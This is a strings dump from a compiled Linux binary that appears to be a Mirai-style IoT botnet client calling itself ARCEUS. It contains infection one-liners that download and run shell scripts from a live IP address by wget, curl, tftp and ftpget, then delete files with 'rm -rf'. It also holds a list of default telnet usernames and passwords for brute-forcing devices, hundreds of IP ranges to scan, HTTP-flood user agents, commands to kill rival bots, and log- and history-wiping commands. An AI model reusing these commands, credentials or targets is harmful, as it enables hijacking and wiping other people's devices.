PTRhX
</v	
<suB
<du0
<xu0
<Xu0
<uu-
<cuJ
RQSPVW
[^_]
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
PRQSVW
[^_]
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
A Santa lives evil at NASA
RPQS
RPQS
RPQS
RPQS
Do nine men interpret Nine men I nod
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
RPQS
[^_]
SVPh
SVPh
SVPh8
SVPh
SVPh8
SVPh
SVPhP
SVPh
SVPh
SVPh
SVPh
SVPh
1v`j
jEhL
[^_]
PRh2
PRht
PRht
SVWQRP
[^_]
WVSQ
VWSPh
< t	
< t	
Y[^_]
PRQW
T$(S
T$(S
QQVj
RPhc$
t$(j
UWVS
t$$P
[^_]
UWVS
[^_]
QPRS
^8PSh
t$,V
UWVS
t$$S
[^_]
UWVS
T$`~
D$(%
WVPR
$VRP
?0u+
D$ P
PQRR
QQRW
[^_]
tP~N
God A red nugget A fat egg under a dog
t@~>=
UWVS
<$u0
\$L9
~	<mtN
:*u4
T$X:
L$pE
D$`P
L$p)
\[^_]
AIt	
UWVS
ZY[^_]
UWVS
D$gP
[^_]
UWVS
Z[^_]
\$HPh
D$)P
RVSh
WVS1
D$ P
D$$Ph
UWVS
t$xSU
t$xj
t$hW
\$DS
D$TPh
E$VRWP
uZRj
t$,U
L[^_]
D$ Pj
D$ Pj
xAPPSh
UWVS
\$Th
D$8P
T$ !
#t$ 
2#D$ 
D$8P
[^_]
UWVS
[^_]
UWVS
u=9J
;X,tQ
[^_]
UWVS
u<9J
SSPQ)
[^_]
uXRh
\$ S
D$,Ph
UWVS
[^_]
UWVS
[^_]
UWVS
;<$|
XZKy
[^_]
UWVS
[^_]
D$ [Xj
}/QQ
uJQQj
t$@hh1
D$4j
UWVS
 <xu
(<`v
}/C;T$
D$,!
[^_]
t$$h
UWVS
u%WWSS
ZYSS
[^_]
yPPj
PPSh
UWVS
Qjxj
D$ P
t@;D$xu
D$ P
t$Dj
D$<PR
t$(j
UWVS
\$89
[^_]
UWVS
)\$(
[^_]
UWVS
PVUR
whQWUR
[^_]
[^_]
UWVS
[^_]
UWVS
e<au
u*z(
u?z=
D$Pp
|$6f
l$61
D$(RP
} Pj
D$'g
D$'f)
D$\p
|$d9
T$`)
L$t1
|$'fto
[^_]
QQWS
'RRWS
UWVS
.u5A
Z[^_]
UWVS
D$7hh
D$<XZj
\$PS
D$$;
}3Ph
t$(j
D$LPU
D$,9
uOQh
K9\$$}
PPVU
;\$d|
D$tP
T$|RW
G$;G wn
9D$xu,
t$4C;\$h}
T$H^_j
uDQh
K9\$$}
D$(@
tMQhh
[^_]
UWVS
t>QQh
\$$S
[^_]
t$4j
t$8j
UWVS
^8WSh
D$(P
D$(P
[^_]
UWVS
^8PSh
D$(PV
x6RW
D$(PV
[^_]
WVS1
UWVS
<rt>
<wt7f
<at/
E4tmPh
t$(V
[^_]
^8QSh
D$ P
D$ P
UWVS
^8PSh
[^_]
UWVS
[^_]
WVS1
PVWS
UWVS
t+F1
D$ PU
[^_]
UWVS
D$(P
yQQVh
u+Rj
D$$P
,[^_]
UWVS
|$-1
+<0u$
D<,.f
\$7S
<[^_]
UWVS
Pj j
D$HP
D$t)
;D$|v
!WWR
[^_]
UWVS
[^_]
UWVS
PPj#
u,PP
t$4U
[^_]
T$$S
UWVS
alula
YRRj.W
D$()
[^_]
UWVS
G;|$,s\PS
[^_]
x86_32
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1
Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911
Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)
Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7
Mozilla/5.0 (PLAYSTATION 3; 3.55)
Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
wii libnup/1.0
Mozilla/4.0 (PSP (PlayStation Portable); 2.00)
PSP (PlayStation Portable); 2.00
Bunjalloo/0.7.6(Nintendo DS;U;en)
Doris/1.15 [en] (Symbian)
BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100
Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01
Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0
SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0
Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0
Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000
MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1
144.202.38.240:23
ogin
sername
assword
Linux
9615-cdp
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://144.202.38.240/bins.sh; curl -O http://144.202.38.240/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 144.202.38.240 -c get NotBackDoor1.sh; chmod 777 NotBackDoor1.sh; sh NotBackDoor1.sh; tftp -r tftp2.sh -g 144.202.38.240; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 144.202.38.240 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh NotBackDoor1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp;rm -rf *;cd /tmp/;wget http://144.202.38.240/bins.sh;sh bins.sh;rm -rf bins.sh;cd /tmp/;wget http://144.202.38.240/bins.sh;sh bins.sh;rm -rf bins.sh
cd /tmp;rm -rf *;cd /tmp/;wget http://144.202.38.240/bins.sh;sh bins.sh;rm -rf bins.sh;cd /tmp/;wget http://144.202.38.240/bins.sh;sh bins.sh;rm -rf bins.sh
telnet
root
admin
support
user
Administrator
service
supervisor
guest
admin1
administrator
666666
888888
ubnt
klv1234
Zte521
hi3518
jvbzd
anko
zlxx
7ujMko0vizxv
7ujMko0admin
system
ikwb
dreambox
realtek
00000000
1111111
1234
12345
54321
123456
pass
meinsm
tech
fucker
xc3511
vizxv
xmhdipc
default
juantech
password
admin1234
1111
smcadmin
klv123
mips
mipsel
i686
i586
jack*
hack*
arm*tel*b1
wget
orion
lol*
busybox*
badbox*
DFhxdhdf
dvrHelper
FDFDHFC
Borrow or rob
FEUB
FTUdftui
GHfjfgvj
jhUOH
JIPJIPJj
JIPJuipjh
kmyx86_64
lolmipsel
RYrydry
TwoFace*
UYyuyioy
x86_64
XDzdfxzf
busybox
badbox
Mirai*
mirai*
cunty*IoT*
/tmp/*
/var/*
/var/run/*
/var/tmp/*
user
name
pass
dvrdvs
mdm9625
F600
F660
F609
nvalid
ailed
ncorrect
enied
rror
oodbye
shell
(null)
:>%$#
%d.%d.%d.%d
37.11.%d.%d
146.158.%d.%d
185.4.%d.%d
188.76.%d.%d
188.77.%d.%d
188.78.%d.%d
188.79.%d.%d
212.106.%d.%d
212.9.%d.%d
213.179.%d.%d
37.132.%d.%d
37.133.%d.%d
37.134.%d.%d
37.135.%d.%d
37.14.%d.%d
37.15.%d.%d
37.35.%d.%d
37.97.%d.%d
62.14.%d.%d
87.216.%d.%d
87.217.%d.%d
87.218.%d.%d
87.219.%d.%d
87.220.%d.%d
87.221.%d.%d
87.222.%d.%d
87.223.%d.%d
90.94.%d.%d
92.191.%d.%d
95.16.%d.%d
95.17.%d.%d
95.18.%d.%d
95.19.%d.%d
95.20.%d.%d
95.21.%d.%d
95.22.%d.%d
95.23.%d.%d
119.157.%d.%d
119.150.%d.%d
119.151.%d.%d
119.152.%d.%d
119.153.%d.%d
119.154.%d.%d
119.155.%d.%d
119.156.%d.%d
119.158.%d.%d
119.159.%d.%d
191.24.%d.%d
187.119.%d.%d
177.215.%d.%d
152.241.%d.%d
182.185.%d.%d
179.80.%d.%d
179.81.%d.%d
179.82.%d.%d
179.83.%d.%d
179.84.%d.%d
179.86.%d.%d
179.87.%d.%d
179.88.%d.%d
179.89.%d.%d
179.90.%d.%d
179.91.%d.%d
179.92.%d.%d
179.93.%d.%d
179.94.%d.%d
179.95.%d.%d
179.96.%d.%d
179.97.%d.%d
179.98.%d.%d
179.99.%d.%d
152.240.%d.%d
152.242.%d.%d
152.243.%d.%d
152.244.%d.%d
152.245.%d.%d
152.246.%d.%d
152.247.%d.%d
152.248.%d.%d
152.249.%d.%d
182.189.%d.%d
182.190.%d.%d
182.191.%d.%d
182.188.%d.%d
182.187.%d.%d
182.186.%d.%d
182.184.%d.%d
179.100.%d.%d
179.101.%d.%d
179.102.%d.%d
179.103.%d.%d
179.110.%d.%d
179.111.%d.%d
179.112.%d.%d
179.113.%d.%d
179.114.%d.%d
179.115.%d.%d
179.116.%d.%d
179.117.%d.%d
191.193.%d.%d
191.194.%d.%d
191.195.%d.%d
191.196.%d.%d
191.197.%d.%d
191.198.%d.%d
152.250.%d.%d
152.251.%d.%d
152.252.%d.%d
152.253.%d.%d
152.254.%d.%d
152.255.%d.%d
177.112.%d.%d
177.113.%d.%d
177.114.%d.%d
177.115.%d.%d
177.116.%d.%d
177.117.%d.%d
177.118.%d.%d
177.119.%d.%d
177.120.%d.%d
177.121.%d.%d
177.138.%d.%d
177.139.%d.%d
177.144.%d.%d
177.145.%d.%d
177.146.%d.%d
177.147.%d.%d
177.160.%d.%d
177.161.%d.%d
177.162.%d.%d
177.163.%d.%d
177.168.%d.%d
177.169.%d.%d
177.170.%d.%d
177.171.%d.%d
177.172.%d.%d
189.96.%d.%d
189.97.%d.%d
189.98.%d.%d
189.99.%d.%d
39.34.%d.%d
59.103.%d.%d
191.12.%d.%d
186.117.%d.%d
179.131.%d.%d
179.129.%d.%d
179.170.%d.%d
191.206.%d.%d
187.118.%d.%d
187.116.%d.%d
179.224.%d.%d
179.166.%d.%d
124.105.%d.%d
119.93.%d.%d
122.54.%d.%d
122.52.%d.%d
122.3.%d.%d
5.78.%d.%d
91.98.%d.%d
49.150.%d.%d
191.80.%d.%d
191.81.%d.%d
191.82.%d.%d
191.83.%d.%d
191.84.%d.%d
191.85.%d.%d
210.213.%d.%d
59.69.%d.%d
125.104.%d.%d
119.92.%d.%d
119.91.%d.%d
49.144.%d.%d
103.20.%d.%d
103.30.%d.%d
103.47.%d.%d
103.57.%d.%d
12.188.%d.%d
12.34.%d.%d
179.105.%d.%d
179.152.%d.%d
189.29.%d.%d
189.32.%d.%d
189.33.%d.%d
189.34.%d.%d
189.35.%d.%d
189.39.%d.%d
189.4.%d.%d
189.54.%d.%d
112.5.%d.%d
117.165.%d.%d
85.3.%d.%d
41.252.%d.%d
104.55.%d.%d
78.186.%d.%d
78.189.%d.%d
221.120.%d.%d
88.5.%d.%d
41.254.%d.%d
45.117.%d.%d
Tacocat
101.51.%d.%d
137.59.%d.%d
14.204.%d.%d
27.50.%d.%d
27.54.%d.%d
27.98.%d.%d
36.32.%d.%d
36.248.%d.%d
39.64.%d.%d
43.253.%d.%d
43.230.%d.%d
163.53.%d.%d
43.245.%d.%d
123.25.%d.%d
103.54.%d.%d
27.255.%d.%d
103.204.%d.%d
123.24.%d.%d
113.191.%d.%d
113.188.%d.%d
113.189.%d.%d
14.160.%d.%d
14.161.%d.%d
14.162.%d.%d
14.163.%d.%d
14.164.%d.%d
14.165.%d.%d
14.166.%d.%d
14.167.%d.%d
14.168.%d.%d
14.169.%d.%d
14.170.%d.%d
14.171.%d.%d
14.172.%d.%d
14.173.%d.%d
14.174.%d.%d
14.175.%d.%d
14.176.%d.%d
14.177.%d.%d
14.178.%d.%d
14.179.%d.%d
14.180.%d.%d
14.181.%d.%d
14.182.%d.%d
14.183.%d.%d
14.184.%d.%d
14.185.%d.%d
14.186.%d.%d
14.187.%d.%d
14.188.%d.%d
14.189.%d.%d
14.190.%d.%d
14.191.%d.%d
45.121.%d.%d
45.120.%d.%d
45.115.%d.%d
43.252.%d.%d
43.240.%d.%d
41.174.%d.%d
45.127.%d.%d
123.16.%d.%d
202.44.%d.%d
116.93.%d.%d
41.253.%d.%d
117.173.%d.%d
113.190.%d.%d
112.196.%d.%d
113.178.%d.%d
112.45.%d.%d
183.223.%d.%d
116.71.%d.%d
103.44.%d.%d
110.235.%d.%d
124.253.%d.%d
211.237.%d.%d
117.175.%d.%d
111.9.%d.%d
222.252.%d.%d
113.174.%d.%d
113.160.%d.%d
113.161.%d.%d
113.162.%d.%d
113.163.%d.%d
113.164.%d.%d
113.165.%d.%d
113.166.%d.%d
113.167.%d.%d
113.168.%d.%d
113.169.%d.%d
123.17.%d.%d
123.21.%d.%d
123.22.%d.%d
222.253.%d.%d
222.254.%d.%d
222.255.%d.%d
41.208.%d.%d
103.198.%d.%d
88.248.%d.%d
88.105.%d.%d
88.247.%d.%d
85.105.%d.%d
188.3.%d.%d
103.203.%d.%d
103.55.%d.%d
103.220.%d.%d
183.233.%d.%d
103.242.%d.%d
103.14.%d.%d
103.195.%d.%d
103.214.%d.%d
103.218.%d.%d
103.225.%d.%d
103.228.%d.%d
103.231.%d.%d
103.60.%d.%d
103.248.%d.%d
103.253.%d.%d
103.255.%d.%d
113.176.%d.%d
113.175.%d.%d
203.134.%d.%d
203.210.%d.%d
117.176.%d.%d
117.171.%d.%d
117.162.%d.%d
203.150.%d.%d
157.119.%d.%d
43.228.%d.%d
162.12.%d.%d
115.220.%d.%d
125.114.%d.%d
37.158.%d.%d
95.9.%d.%d
58.71.%d.%d
1.56.%d.%d
1.188.%d.%d
27.0.%d.%d
27.8.%d.%d
27.112.%d.%d
27.192.%d.%d
42.4.%d.%d
42.48.%d.%d
42.52.%d.%d
42.56.%d.%d
42.63.%d.%d
42.84.%d.%d
42.176.%d.%d
42.224.%d.%d
60.0.%d.%d
60.16.%d.%d
62.30.%d.%d
62.252.%d.%d
62.254.%d.%d
62.255.%d.%d
77.96.%d.%d
77.97.%d.%d
77.98.%d.%d
77.100.%d.%d
77.102.%d.%d
81.100.%d.%d
94.174.%d.%d
49.118.%d.%d
78.188.%d.%d
14.33.%d.%d
91.83.%d.%d
146.88.%d.%d
183.71.%d.%d
192.168.%d.%d
89.71.%d.%d
244.77.%d.%d
125.27.%d.%d
101.105.%d.%d
gethostbyname
setsockopt
connect
admin
[ARCEUS] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s
REPORT %s:%s:%s
[0;31m[ARCEUS] Successfully Bruted IP: 
[0;33m%s
[0;31m Port: 
[0;33m23 
[0;31mUsername: 
[0;33m%s 
[0;31mPassword: 
[0;33m%s
[0;37m
rm -rf %s;
pkill -9 %s;killall -9 %s;
shell
CONNECTED
connected
[96m[PHONE] 
[97mFound And Infected A Phone 
[96m[%s]
oelinux123
[96m[TELNET] 
[97mFound And Infected A Telnet 
[96m[%s]
%s %s HTTP/1.1
Host: %s
User-Agent: %s
Connection: close
history -c;history -w
cd /;rm -rf ~/.bash_history
TRANGE
RANGE <option 0-idk>
Telnet Range %d->%d
TELNET
FASTLOAD
MIRAI
MRANGE
Mirai Range %d->%d
PHONE
MTRANGE
Mirai Test RANGE <option 0-idk>
Range %d->%d
MIRAITEST
Telnet test RANGE <option 0-idk>
TELNETTEST
HTTP
KILLATTK
LOLNOGTFO
UPDATE
[Updating] [%s:%s]
/etc/resolv.conf
nameserver 8.8.8.8
nameserver 8.8.4.4
rm -rf /tmp/* /var/* /var/run/* /var/tmp/*
rm -rf /var/log/wtmp
rm -rf ~/.bash_history
BIG_ENDIAN
LITTLE_ENDIAN
BIG_ENDIAN_W
LITTLE_ENDIAN_W
UNKNOWN
/usr/bin/python
SERVER
DEVICE
8.8.8.8
/proc/net/route
	00000000	
Vulcan
[96m[%s] 
[97mConnected -> %s -> %s
PING
%s%s%m
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Degas are we not drawn onward no In union drawn onward to new eras aged
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
%s%s%s
Error 0
Unknown host
Host name lookup failure
Unknown server error
No address associated with name
Resolver error
/bin/sh
/dev/null
L(knN
 Ainf
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
0123456789abcdef
/etc/hosts
/etc/config/hosts
CAk[S
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
